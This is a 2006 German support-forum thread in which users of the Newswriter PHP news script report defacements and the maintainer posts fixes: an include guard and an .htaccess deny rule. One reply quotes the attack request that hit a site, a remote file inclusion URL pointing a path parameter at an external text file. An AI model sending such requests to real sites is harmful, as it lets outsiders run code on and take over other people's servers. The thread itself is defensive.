Mad Line
Newbie
 Offline
Beiträge: 14
|
 |
« am: 26-09-2006, 21:58:59 » |
|
Moin Moin ich nutzte euer Newssystem schon eine weile hatte bis jetzt immer angst es auf den neusten stand zubringen weil ich echt froh bin das es überhaupt läuft. seid vorgestern ist unsere seite zwei mal gehackt worden (Newswriter SW 1.2 (21.09.2003) zwei mal wurde die startseite geändert und auf die seite verwiesen http://www.fatalerror.usim forum steht drinne wie es geht leider is meine sprach kenntniss nicht so doll http://www.fatalerror.us/modules.php?name=Forums&file=viewtopic&t=106ich weiss nicht ob der bug auch in allen andern versionen enthalten ist. Gruss Mad |
|
|
|
|
Gespeichert
|
|
|
|
Yoshi
Newbie
Offline
Beiträge: 2
|
|
« Antwort #1 am: 27-09-2006, 15:51:47 » |
|
hallo ...
hab noch die alte version newswriter 2.55 auf meiner webseite installiert ... das system lief 4 jahre ohne probleme ...
nun wurde die seite wie oben beschrieben schon 2mal gehackt ...
|
|
|
|
|
Gespeichert
|
|
|
|
|
basti
|
|
« Antwort #2 am: 27-09-2006, 18:01:38 » |
|
Hmm dann sollte aber auch der Hoster ordentlich seine Seiten absichern, denn wenn url_fopen=off ist, dann kann schon mal wesentlich weniger passieren, weil kein Schadcode von einer anderen Seite geladen werden kann.
|
|
|
|
|
Gespeichert
|
|
|
|
Mad Line
Newbie
Offline
Beiträge: 14
|
|
« Antwort #3 am: 27-09-2006, 22:46:17 » |
|
also Provider ist bei uns Puretec ich habe mir grade den salat mal genauer angeschaut und baue grade dein empfohlenden code schnippsel ein. die editfunc.inc.php würde gelöscht und ein Hacked by MiTnicK <br> D3ng3s1z t34m was here MiTnicK  genau in diesen moment wurde die seite schon wieder gehackt von einer andern hacker group (türkische) bin aber noch nicht durch mit dem code einfügen. |
|
|
|
« Letzte Änderung: 27-09-2006, 23:57:39 von Mad Line »
|
Gespeichert
|
|
|
|
Mad Line
Newbie
Offline
Beiträge: 14
|
|
« Antwort #4 am: 28-09-2006, 00:00:33 » |
|
so das sieht ganz gut aus das mit der umlenkung klappt! Danke dafür erst mal ob das die hacker abhält weiss ich nicht, aber ich habe mal für die Hacker eine kleine willkommens seite gebastelt auf die umgeleitet wird  |
|
|
|
|
Gespeichert
|
|
|
|
|
basti
|
|
« Antwort #5 am: 28-09-2006, 07:38:45 » |
|
Hi,
das hält die sicher ab, weil Sie ja die Seite nicht mehr einzeln aufrufen können.
|
|
|
|
|
Gespeichert
|
|
|
|
|
cg1
|
|
« Antwort #6 am: 28-09-2006, 10:16:13 » |
|
hatte ein gleiches problem, mit dem bugfix scheints jetzt zu laufen.
welche chmods empfehlen sich für die dateien im include ordner sowie für die sonstiges .php files?
wie wärs, wenn eine mailingliste für solche security probleme eingerichtet wird?
|
|
|
|
|
Gespeichert
|
|
|
|
|
basti
|
|
« Antwort #7 am: 28-09-2006, 10:30:18 » |
|
Mailing Liste ist eine gute Idee.
Wobei das ganze wie schon gesagt nur Probleme bereiten kann, wenn url_fopen auf on steht.
|
|
|
|
|
Gespeichert
|
|
|
|
|
basti
|
|
« Antwort #8 am: 28-09-2006, 11:36:47 » |
|
Hallo zusammen, zweite Möglichkeit um zu verhindern, dass die includierten Dateien aufgerufen werden dürfen ist eine .htaccess Datei mit folgendem Inhalt im Ordner include: AuthType Basic
<Limit GET>
Order Allow,Deny
Deny from all
</Limit>
<Limit POST>
Order Allow,Deny
Deny from all
</Limit>
|
|
|
|
|
Gespeichert
|
|
|
|
|
basti
|
|
« Antwort #9 am: 28-09-2006, 11:59:07 » |
|
Hallo, verhindert, dass man die include Seiten aufrufen kann. In folgenden Dateien im Ordner include nach <?php: editfunc.inc.php
main.inc.php
diesen Code einfügen: if(!defined('HAUPTSEITE')) {
header("Location: ../index.php");
exit;
} Und in der conf.php dann nach dem <?php folgendes einfügen: define('HAUPTSEITE', 1); Damit wird bei jeglichem Versuch eine include Datei aufzurufen die Startseite des Newswriters aufgerufen. |
|
|
|
« Letzte Änderung: 28-09-2006, 13:39:56 von sbaumann »
|
Gespeichert
|
|
|
|
|
cg1
|
|
« Antwort #10 am: 28-09-2006, 12:25:57 » |
|
u.a. wurde bei folgendes skript über ein formularskript an meine seite geschickt: http://www.domain.de/skriptverzeichnis/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://www.geocities.com/xxx/xxx.txt? der newsletter wär auch nur sowas wie nen informationsmittel: "achtung folgendes problem ist bekannt, prüft bitte ob...". man schaut ja nicht jeden tag ins forum. beste grüße [edit by admin]Link entfernt[/edit] |
|
|
|
« Letzte Änderung: 28-09-2006, 13:37:46 von sbaumann »
|
Gespeichert
|
|
|
|
|
cg1
|
|
« Antwort #11 am: 28-09-2006, 12:37:25 » |
|
hab geocities soeben informiert, die url sollte bald weg sein. den quellcode der .txt datei hab ich gesichert, falls ihn jemand zur auswertung braucht.
sobald geocities reagiert hat, werde ich strafanzeige gegen den inhaber erstatten.
|
|
|
|
|
Gespeichert
|
|
|
|
|
cg1
|
|
« Antwort #12 am: 28-09-2006, 17:57:38 » |
|
wenn ich die .htaccess datei wie beschrieben einbaue tritt zwar das problem nicht mehr auf, aber leider wird auch der visual editor nicht mehr geladen. gibts dafür eine lösung?
gruß
|
|
|
|
|
Gespeichert
|
|
|
|
|
basti
|
|
« Antwort #13 am: 28-09-2006, 21:39:40 » |
|
Hi,
dann geht leider nur die andere Variante.
Ich werde aber im laufe der nächsten Tage eine überarbeitete Version online stellen, wo das Problem dann behoben ist.
|
|
|
|
|
Gespeichert
|
|
|
|
|
barome
|
|
« Antwort #14 am: 28-09-2006, 23:11:43 » |
|
Hallo zusammen,
die Hacker haben auch bei mir zugeschlagen. Reicht es prinzipiell wenn der Provider url_fopen deaktiviert oder sollte der Code noch geändert werden?
Gruß B.
|
|
|
|
|
Gespeichert
|
|
|
|
|
Scriptfragen
